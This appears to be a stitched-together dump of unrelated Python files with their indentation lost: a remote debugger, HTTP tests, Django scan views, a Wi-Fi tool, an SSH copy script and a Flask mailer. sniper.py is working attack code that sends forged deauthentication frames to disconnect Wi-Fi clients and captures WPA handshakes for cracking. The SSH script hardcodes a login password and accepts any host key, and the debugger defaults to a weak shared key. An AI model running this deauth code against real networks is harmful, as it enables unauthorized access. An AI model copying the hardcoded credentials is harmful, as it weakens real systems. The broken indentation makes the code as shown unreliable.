# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
from multiprocessing.connection import Listener
address = (host, port) # family is deduced to be 'AF_INET'
listener = Listener(address, authkey=authkey)
print "qdb debugger backend: waiting for connection at", address
conn = listener.accept()
print 'qdb debugger backend: connected to', listener.last_accepted
# create the backend
qdb = Qdb(conn, redirect_stdio=True, allow_interruptions=True)
try:
print "running", mainpyfile
qdb._runscript(mainpyfile)
print "The program finished"
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print "The program exited via sys.exit(). Exit status: ",
print sys.exc_info()[1]
raise
except:
raise
conn.close()
listener.close()
qdb = None
def set_trace(host='localhost', port=6000, authkey='secret password'):
"Simplified interface to debug running programs"
global qdb, listener, conn
from multiprocessing.connection import Listener
# only create it if not currently instantiated
if not qdb:
address = (host, port) # family is deduced to be 'AF_INET'
listener = Listener(address, authkey=authkey)
conn = listener.accept()
# create the backend
qdb = Qdb(conn)
# start debugger backend:
qdb.set_trace()
def quit():
"Remove trace and quit"
global qdb, listener, conn
if qdb:
sys.settrace(None)
qdb = None
if conn:
conn.close()
conn = None
if listener:
listener.close()
listener = None
if __name__ == '__main__':
# When invoked as main program:
if '--test' in sys.argv:
test()
# Check environment for configuration parameters:
kwargs = {}
for param in 'host', 'port', 'authkey':
if 'QDB_%s' % param.upper() in os.environ:
kwargs[param] = os.environ['QDB_%s' % param.upper()]
if not sys.argv[1:]:
        # connect to a remote debugger
connect(**kwargs)
else:
# start the debugger on a script
# reimport as global __main__ namespace is destroyed
import qdb
qdb.main(**kwargs)
|
test_http_server.py
|
from collections import OrderedDict
from mock_decorators import setup, teardown
from threading import Thread
from poster.encode import MultipartParam
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
import urllib2
import urllib
def http_test(res, url, get=None, post=None):
response = ''
try:
if get:
url += '?' + urllib.urlencode(get)
if post:
post = urllib.urlencode(post)
request = urllib2.urlopen(url, post, 2)
response = request.read()
except:
return 1
if response != res:
return 1
return 0
@setup('HTTP GET Parameters')
def setup_http_get_params(e):
def testRun():
return http_test('var1 = val with spaces\nva=r+ = so&me%', 'http://etd.local/get', OrderedDict([('var1', 'val with spaces'), ('va=r+', 'so&me%')]))
Thread(target=testRun).start()
@teardown('HTTP GET Parameters')
def teardown_http_get_params(e):
return 0
@setup('HTTP POST Parameters')
def setup_http_post_params(e):
def testRun():
return http_test('var2 = val with spaces', 'http://etd.local/post', None, {'var2' : 'val with spaces'})
Thread(target=testRun).start()
@teardown('HTTP POST Parameters')
def teardown_http_post_params(e):
return 0
@setup('HTTP GET+POST Parameters')
def setup_http_getpost_params(e):
def testRun():
return http_test('var3 = val with spaces\nva&r+ = so=me%', 'http://etd.local/get_and_post', {'var3' : 'val with spaces'}, {'va&r+' : 'so=me%'})
Thread(target=testRun).start()
@teardown('HTTP GET+POST Parameters')
def teardown_http_getpost_params(e):
return 0
@setup('HTTP Upload')
def setup_http_upload(e):
def testRun():
response = ''
try:
register_openers()
p = MultipartParam("file", "0123456789abcdef", "test.txt", "text/plain; charset=utf8")
datagen, headers = multipart_encode( [("var4", "val with spaces"), p] )
request = urllib2.Request('http://etd.local/upload', datagen, headers)
response = urllib2.urlopen(request, None, 2).read()
except:
return 1
if response != 'test.txt:16\nvar4 = val with spaces':
return 1
return 0
Thread(target=testRun).start()
@teardown('HTTP Upload')
def teardown_http_upload(e):
return 0
|
views.py
|
# # scans and scan settings
import logging
from threading import Thread
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from dojo.forms import ScanSettingsForm, DeleteIPScanForm, VaForm
from dojo.management.commands.run_scan import run_on_deman_scan
from dojo.models import Product, Scan, IPScan, ScanSettings
from dojo.utils import add_breadcrumb, get_system_setting
logger = logging.getLogger(__name__)
"""
Greg:
status: completed in use
"""
def view_scan(request, sid):
scan = get_object_or_404(Scan, id=sid)
prod = get_object_or_404(Product, id=scan.scan_settings.product.id)
scan_settings_id = scan.scan_settings.id
if request.user.is_staff or request.user in prod.authorized_users.all():
pass # user is authorized for this product
else:
raise PermissionDenied
if request.method == "POST":
form = DeleteIPScanForm(request.POST, instance=scan)
if form.is_valid():
scan.delete()
messages.add_message(request,
messages.SUCCESS,
'Scan results deleted successfully.',
extra_tags='alert-success')
return HttpResponseRedirect(
reverse('view_scan_settings', args=(prod.id, scan_settings_id,)))
else:
messages.add_message(
request,
messages.ERROR,
'There was a problem deleting scan, please try again.',
extra_tags='alert-danger')
ipScans = []
ipScan_objects = IPScan.objects.filter(scan=scan)
for i in ipScan_objects:
        # i.services stores the repr of a list of (port, protocol, status, service)
        # tuples; parse it with ast.literal_eval instead of eval() for safety
        service_list = ast.literal_eval(i.services)
row = [i.address]
for (port, protocol, status, service) in service_list:
row.append(port)
row.append(protocol)
row.append(status)
row.append(service)
ipScans.append(row)
row = [""]
form = DeleteIPScanForm(instance=scan)
add_breadcrumb(parent=scan, top_level=False, request=request)
return render(
request,
'dojo/view_scan.html',
{'scan': scan,
'ipScans': ipScans,
'form': form}
)
"""
Greg:
status: completed in use
"""
def view_scan_settings(request, pid, sid):
scan_settings = get_object_or_404(ScanSettings, id=sid)
user = request.user
if user.is_staff or user in scan_settings.product.authorized_users.all():
pass
else:
raise PermissionDenied
scan_is_running = False
if request.method == 'POST':
if 'baseline' in request.POST:
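            # mark the selected scan as the baseline and clear the flag on every other scan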
baseline_scan = get_object_or_404(Scan,
id=request.POST['baseline'])
for scan in scan_settings.scan_set.all():
if scan.id == baseline_scan.id:
scan.baseline = True
else:
scan.baseline = False
scan.save()
messages.add_message(request,
messages.SUCCESS,
                                 'Baseline successfully saved.',
extra_tags='alert-success')
elif 'scan_now' in request.POST:
t = Thread(target=run_on_deman_scan, args=(str(sid),))
t.start()
messages.add_message(request,
messages.SUCCESS,
'Scan successfully started.',
extra_tags='alert-success')
# need to redirect else reload will kick off new scans
return HttpResponseRedirect(reverse('view_scan_settings', args=(scan_settings.product.id, sid,)))
for scan in scan_settings.scan_set.all():
if scan.status in ["Running", "Pending"]:
scan_is_running = True
add_breadcrumb(parent=scan_settings, top_level=False, request=request)
return render(
request,
'dojo/view_scan_settings.html',
{'scan_settings': scan_settings,
'scans': scan_settings.scan_set.order_by('id'),
'scan_is_running': scan_is_running,
})
"""
Greg:
status: in Prod
view scan settings for self-service scan
"""
def edit_scan_settings(request, pid, sid):
old_scan = ScanSettings.objects.get(id=sid)
pid = old_scan.product.id
user = request.user
if user.is_staff or user in old_scan.product.authorized_users.all():
pass
else:
raise PermissionDenied
if request.method == 'POST':
if request.POST.get('edit'):
form = ScanSettingsForm(data=request.POST, instance=old_scan)
if form.is_valid():
form.save()
messages.add_message(request,
messages.SUCCESS,
'Scan settings saved.',
extra_tags='alert-success')
return HttpResponseRedirect(reverse('view_scan_settings', args=(old_scan.product.id, sid,)))
else:
messages.add_message(request,
messages.ERROR,
'Scan settings not saved.',
extra_tags='alert-danger')
add_breadcrumb(parent=old_scan, top_level=False, request=request)
return render(request,
'dojo/edit_scan_settings.html',
{'form': form,
'sid': sid,
'pid': pid})
elif request.POST.get('delete'):
pid = old_scan.product.id
old_scan.delete()
messages.add_message(request,
messages.SUCCESS,
'Scan settings deleted.',
extra_tags='alert-success')
return HttpResponseRedirect(reverse('view_product', args=(pid,)))
try:
form = ScanSettingsForm(instance=old_scan)
    except Exception:
form = ScanSettingsForm()
add_breadcrumb(parent=old_scan, top_level=False, request=request)
return render(request,
'dojo/edit_scan_settings.html',
{'form': form,
'sid': sid,
'pid': pid})
"""
Greg
status: in prod, completed by interns not enabled by default
Self-service port scanning tool found at the product level
"""
def gmap(request, pid):
prod = get_object_or_404(Product, id=pid)
if request.user.is_staff or request.user in prod.authorized_users.all():
pass # user is authorized for this product
else:
raise PermissionDenied
form = ScanSettingsForm()
if request.method == 'POST':
form = ScanSettingsForm(data=request.POST)
if form.is_valid():
new_scan = form.save(commit=False)
new_scan.product = prod
new_scan.user = request.user
new_scan.save()
messages.add_message(request,
messages.SUCCESS,
'Scan settings saved.',
extra_tags='alert-success')
return HttpResponseRedirect(reverse('view_product', args=(pid,)))
else:
messages.add_message(request,
messages.ERROR,
'Scan settings not saved.',
extra_tags='alert-danger')
add_breadcrumb(title="Scan", top_level=False, request=request)
return render(request,
'dojo/gmap.html',
{'form': form,
'pid': pid})
"""
Greg
Status: in dev, on hold
Self service tool for launching nessus scans
"""
def launch_va(request, pid):
if request.method == 'POST':
form = VaForm(request.POST)
        if form.is_valid():
new_va = form.save(commit=False)
new_va.user = request.user
new_va.save()
messages.add_message(request,
messages.SUCCESS,
'VA successfully created.',
extra_tags='alert-success')
else:
form = VaForm()
return render(request,
"dojo/launch_va.html",
{'form': form, 'pid': pid})
|
sniper.py
|
from scapy.sendrecv import sniff
from scapy.sendrecv import sendp
from scapy.config import conf
from scapy.layers.dot11 import Dot11
from scapy.layers.dot11 import RadioTap
from scapy.layers.dot11 import Raw
from scapy.layers.dot11 import Dot11Deauth
from utils import org
import signal
import sys
import time
import threading
import exceptions
import binascii
import os
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
from scapy.layers.eap import EAPOL
class Sniper:
__SNIFFER_STATUS = False
__CONNECTECD_CL = {}
__CL_COUNTER = {}
__c_HANDSHAKE = [0, 0, 0, 0]
__c_TGT = ''
out__ = ['333300000016', '3333ff9ddffd', 'ffffffffffff', '01005e7ffffa', '333300000001', '01005e0000fb']
def __init__(self, iface_instance, bssid, essid, channel, timeout, pully, verbose):
self.iface_instance = iface_instance
self.iface = self.iface_instance.iface
self.bssid = bssid
self.essid = essid
self.ch = channel
self.timeout = timeout
self.pull = pully
self.verbose = verbose
#self.channel_shifter = self.channel_shifter(self.ch)
def __str__(self):
return self.essid
def channel_shifter(self, ch):
self.iface_instance.stop_hopper = 1
while not self.iface_instance._interface__STATUS_END:
time.sleep(1)
self.iface_instance.shift_channel(ch)
def cl_generator(self):
try:
sniff(iface=self.iface, prn=self.cl_generator_replay)
raise KeyboardInterrupt
except KeyboardInterrupt:
if self.verbose:
self.pull.use("Clients %s (%s) - %s[Found %s]%s" % (self.bssid.replace(':', '').upper(), self.pull.DARKCYAN+org(self.bssid).org+self.pull.END,\
self.pull.GREEN, len(self.__CONNECTECD_CL), self.pull.END))
else:
self.pull.use("Clients %s - [Found %s]" % (self.bssid.replace(':', '').upper(), len(self.__CONNECTECD_CL)))
def cl_generator_replay(self, pkt):
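        # Treat a station as a connected client only after it has exchanged more
        # than one data frame with the target BSSID (tracked in __CL_COUNTER),
        # which filters out one-off frames; multicast/broadcast addresses listed
        # in out__ are ignored.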
if pkt.haslayer(Dot11) and pkt.getlayer(Dot11).type == 2L and not pkt.haslayer(EAPOL):
__sn = pkt.getlayer(Dot11).addr2
__rc = pkt.getlayer(Dot11).addr1
if __sn == self.bssid and not (__sn.replace(':', '').lower() in self.out__):
try:
if self.__CL_COUNTER[__rc] > 1:
self.__CONNECTECD_CL[__rc] = self.dbM(pkt)
else:
self.__CL_COUNTER[__rc] += 1
except KeyError:
self.__CL_COUNTER[__rc] = 1
if self.verbose:
self.pull.info("Station %s (%s) %s<>%s %s (%s) %s[Data Frame]%s" % (__rc.replace(':', '').upper(), \
self.pull.DARKCYAN+org(__rc).org+self.pull.END, self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.DARKCYAN+org(__sn).org+self.pull.END, self.pull.YELLOW, self.pull.END))
else:
self.pull.info("Station %s %s<>%s %s %s[Data Frame]%s" % (__rc.replace(':', '').upper(), self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
elif __rc == self.bssid and not (__rc.replace(':', '').lower() in self.out__):
try:
if self.__CL_COUNTER[__sn] > 1:
self.__CONNECTECD_CL[__sn] = self.dbM(pkt)
else:
self.__CL_COUNTER[__sn] += 1
except KeyError:
self.__CL_COUNTER[__sn] = 1
if self.verbose:
self.pull.info("Station %s (%s) %s<>%s %s (%s) %s[Data Frame]%s" % (__rc.replace(':', '').upper(), \
self.pull.DARKCYAN+org(__rc).org+self.pull.END, self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.DARKCYAN+org(__sn).org+self.pull.END, self.pull.YELLOW, self.pull.END))
else:
self.pull.info("Station %s %s<>%s %s %s[Data Frame]%s" % (__rc.replace(':', '').upper(), self.pull.RED, self.pull.END, \
__sn.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
def clients(self):
pwr__ = []
LIT__ = {self.bssid: []}
for cl, pwr in self.__CONNECTECD_CL.items():
pwr__.append(pwr)
pwr__ = sorted(pwr__, reverse=True)
for pwr in pwr__:
for tuple_ in self.__CONNECTECD_CL.items():
if tuple_[1] == pwr:
                    # skip IPv6 multicast (33:33:...) and broadcast (ff:ff:...) destinations
                    if not tuple_[0].startswith('33:33:') and not tuple_[0].startswith('ff:ff:'):
LIT__[self.bssid].append(tuple_)
return LIT__
def dbM(self, pkt):
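        # Heuristic signal-strength read: scan the undecoded RadioTap bytes for
        # the first value that falls into a plausible dBm range (-90 to -20);
        # dbm_sig stays at -999 if no such byte is found.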
if pkt.haslayer(RadioTap):
extra = pkt.notdecoded
dbm_sig = -999
for p in extra:
if -(256-ord(p)) > -90 and -(256-ord(p)) < -20:
dbm_sig = -(256-ord(p))
break
return dbm_sig
    def verify_handshake(self, tgt):
        # complete only once all four EAPOL handshake messages have been captured
        if 0 in self.__c_HANDSHAKE:
            return 0
        return 1
def start_eapol_sniffer(self):
try:
            self.__SNIFFER_STATUS = True
sniff(iface=self.iface, prn=self.eapol_sniffer_replay)
except ValueError:
pass
def eapol_sniffer_replay(self, pkt):
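        # Classify captured EAPOL frames into the four WPA 4-way handshake
        # messages using the DS bits plus the nonce/MIC fields:
        #   M1 (AP->STA, nonce set, MIC zero)  -> slot 0
        #   M2 (STA->AP, nonce set, MIC set)   -> slot 1
        #   M3 (AP->STA, nonce set, MIC set)   -> slot 2
        #   M4 (STA->AP, nonce zero, MIC set)  -> slot 3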
fNONCE = "0000000000000000000000000000000000000000000000000000000000000000"
fMIC = "00000000000000000000000000000000"
if pkt.haslayer(EAPOL):
__sn = pkt[Dot11].addr2
__rc = pkt[Dot11].addr1
to_DS = pkt.getlayer(Dot11).FCfield & 0x1 !=0
from_DS = pkt.getlayer(Dot11).FCfield & 0x2 !=0
if __sn == self.bssid:
tgt = __rc
elif __rc == self.bssid:
tgt = __sn
else:
return
if from_DS == True:
nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
if __sn == self.bssid and nonce != fNONCE and mic == fMIC:
self.__c_HANDSHAKE[0] = pkt
elif __sn == self.bssid and nonce != fNONCE and mic != fMIC:
self.__c_HANDSHAKE[2] = pkt
elif to_DS == True:
nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
if __rc == self.bssid and nonce != fNONCE and mic != fMIC:
self.__c_HANDSHAKE[1] = pkt
elif __rc == self.bssid and nonce == fNONCE and mic != fMIC:
self.__c_HANDSHAKE[3] = pkt
return
def shoot(self, tgt, deauth, _phaz_instance):
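        # Start the EAPOL sniffer (once), then send deauthentication frames in
        # both directions (AP->client and client->AP) so the station reconnects
        # and a fresh 4-way handshake can be captured.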
self.__c_TGT = tgt
if not self.__SNIFFER_STATUS:
sniffer_thread = threading.Thread(target=self.start_eapol_sniffer)
sniffer_thread.daemon = True
sniffer_thread.start()
while not self.__SNIFFER_STATUS:
time.sleep(1)
__pkt_to_cl = RadioTap() / Dot11(addr1=tgt, addr2=self.bssid, addr3=self.bssid) / Dot11Deauth(reason=7)
__pkt_to_ap = RadioTap() / Dot11(addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7)
for n in range(deauth * 1):
sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False)
sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False)
if self.verify_handshake(tgt):
_phaz_instance.THEPOL = tuple(self.__c_HANDSHAKE)
|
sshCalCopy.py
|
#!/usr/bin/python
import paramiko
import sys
import os
import string
import threading
import time
import select
from datetime import datetime
# from fileNameGui import FileGUI
# import fileNameGui
# from Tkinter import *
import qs
global threads
threads = []
global upload
upload = False
class FileCopy:
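    # Pulls calibration images from a bank of Raspberry Pis (192.168.0.201-221)
    # over SFTP into a timestamped cal_<epoch> folder under the local
    # ScanFolder directory; queueThread() lets a GUI rename the destination.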
def __init__(self):
self.hosts = ['192.168.0.201','192.168.0.202', '192.168.0.203' ,'192.168.0.204','192.168.0.205','192.168.0.206','192.168.0.207', '192.168.0.208', '192.168.0.209', '192.168.0.210', '192.168.0.211', '192.168.0.212', '192.168.0.213', '192.168.0.214', '192.168.0.215', '192.168.0.216','192.168.0.217', '192.168.0.218', '192.168.0.219', '192.168.0.220', '192.168.0.221',]
self.FolderName = '\\cal_' + str(time.time())
self.subFolder = '\\tempFiles'
self.fullFilePath = self.docFilePath() + self.FolderName
self.subFolderPath = self.fullFilePath + self.subFolder
self.filesTransferred = 0
self.filesToTransfer = 0
#TODO: Autodetermine filepath to docs
def docFilePath(self):
#return '/home/aaron/Documents/ScanFolder/'
#return 'C:\Users\\amjaeger\Documents\ScanFolder'
return str('C:\\Users\\amjaeger\\Documents\\ScanFolder')
#return 'C:\Users\\amjaeger\Dropbox (MIT)\UROPs_DIC_indenter_project\Aaron\scanFolder'
def updateFilePath(self, newFolderName):
print ("updating filePath")
self.FolderName = newFolderName
print (self.fullFilePath)
self.fullFilePath = self.docFilePath() + newFolderName
print (self.fullFilePath)
def updateFullPath(self, newFullPath):
self.fullFilePath = newFullPath
#TODO: Update self.foldername
def getFullFilePath(self):
return self.fullFilePath
def getSubFolderpath(self):
return self.subFolderPath
def getHosts(self):
return self.hosts
def queueThread(self):
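        # Poll the GUI queue once per second: an empty string keeps the current
        # destination folder, any other value becomes the new folder name, and
        # the resolved path is pushed back for the GUI to display.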
while True:
# print qs.qGUI.qsize()
time.sleep(1)
print( "thread count" + str(threading.activeCount() ) )
# print qs.qGUIEmpty()
#Upload button has been pressed!
if(not qs.qGUIEmpty()):
temp = qs.qGUIGet()
print( temp )
if('' == temp):
qs.qGUIUpdatePut(str(self.getFullFilePath()))
else:
self.updateFilePath(temp)
newName = self.getFullFilePath()
qs.qGUIUpdatePut(str(self.getFullFilePath()))
# for h in self.hosts:
# workon(h, "", self.getFullFilePath())
# print "getting files for " + h
# print "done getting files"
def workon(host,command,localDir, indexStart):
print (host)
ssh = paramiko.SSHClient()
print ('client created' + str(host))
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print ('set missing key policy' + str(host))
ssh.connect(host, username='pi', password='biomech1')
    print ('connected' + str(host))
#######
# Create directory on raspi
#########
sftp = ssh.open_sftp()
piDir = '/home/pi/piTemp'
###########
# Create directory on current machine
###########
# localDir = createDir(homeDir, host)
#######
# copy files from raspi
##########
copyFiles(sftp, piDir, host, localDir, indexStart)
def createDir(homeDir): #, host):
localDir = homeDir # + host[10:13]
print (localDir)
if not os.path.exists(localDir):
os.makedirs(localDir)
return localDir
def indexLocal(localDir):
fileList = os.listdir(localDir)
if(0 == len(fileList)):
return 1
else:
indexList = []
print (fileList);
for item in fileList:
print (item)
itemLen = len(item)
itemIndex = item[4:itemLen-4]
indexList.append(int(itemIndex))
print (indexList)
print ("sorted")
sortedIndex = sorted(indexList)
print (sortedIndex[-1])
return (sortedIndex[-1] + 1)
def copyFiles(sftp, piDir, host, localDir, indexStart):
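    # Pull every file from the Pi's /home/pi/piTemp over SFTP, save it locally
    # named after the host's last address octets, and delete the remote copy.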
fileList = sftp.listdir(piDir)
sortedFiles = sorted(fileList)
index = indexStart
print ("piDir")
print (sortedFiles)
if len(sortedFiles) > 1:
print ("more than 1 file for " + host)
else:
print ("only one file")
for file in sortedFiles:
print (file + " " + host)
try:
print ('trying to get file')
indexString = str(index)
if(index < 10):
indexString = "00" + str(index)
elif(index > 9 and index < 100):
indexString = "0" + str(index)
sftp.get((piDir + '/' +file),(localDir + '/' + host[10:13] + '.jpg')) #_' + indexString + '.jpg')) # rmvIlligal(file) + host[10:13] + '.jpg'))
print ('got file ' + host )
sftp.remove((piDir + '/' + file))
print ('Original Removed')
index += 1
except Exception as e:
print ( str(e))
print ('couldnt get that one')
print ("done " + host)
def rmvIlligal(input):
valid_chars = "-_()%s%s" % (string.ascii_letters, string.digits)
# print valid_chars
output = ''
for c in input:
if c in valid_chars:
output += c
length = len(output)
return output[0:length-3]
def main():
# threads = []
command = ''
qs.init()
fileCopier = FileCopy()
path = fileCopier.getFullFilePath()
hosts = fileCopier.getHosts()
###########
# Create directory on current machine
###########
localDir = createDir(path)
#tempSub = createDir
index = indexLocal(localDir)
for h in hosts:
t = threading.Thread(target=workon, args=(h,command, localDir,index))
t.start()
threads.append(t)
for t in threads:
        t.join()
folderTemp = fileCopier.getFullFilePath()
qs.qGUIUpdatePut(folderTemp)
#setup Threads
testThread = threading.Thread(target = fileCopier.queueThread)
testThread.setDaemon(True)
testThread.start()
# threads.append(testThread)
# global guiThread
# guiThread = threading.Thread(target=fileNameGui.startGUI()) #, args=(root))
# guiThread.setDaemon(True)
# guiThread.start()
# # threads.append(guiThread)
if __name__ == "__main__":
print ("sshCopy is main")
main()
# clusterssh pi@192.168.0.201 pi@192.168.0.202 pi@192.168.0.203 pi@192.168.0.204 pi@192.168.0.205 pi@192.168.0.206 pi@192.168.0.207 pi@192.168.0.208 pi@192.168.0.209 pi@192.168.0.210 pi@192.168.0.211 pi@192.168.0.212
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
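    # mail.send() needs an application context; the worker thread does not
    # inherit one from the request, so push it explicitly here.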
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['TWEZANA_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['TWEZANA_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
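# A minimal sketch of a call site (recipient, template name and kwargs are
# hypothetical): send_email('user@example.com', 'Confirm your account',
# 'auth/email/confirm', user=user, token=token) renders auth/email/confirm.txt
# and .html with user/token in the template context and returns the worker
# thread, which callers may join() if they need to block until delivery.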
|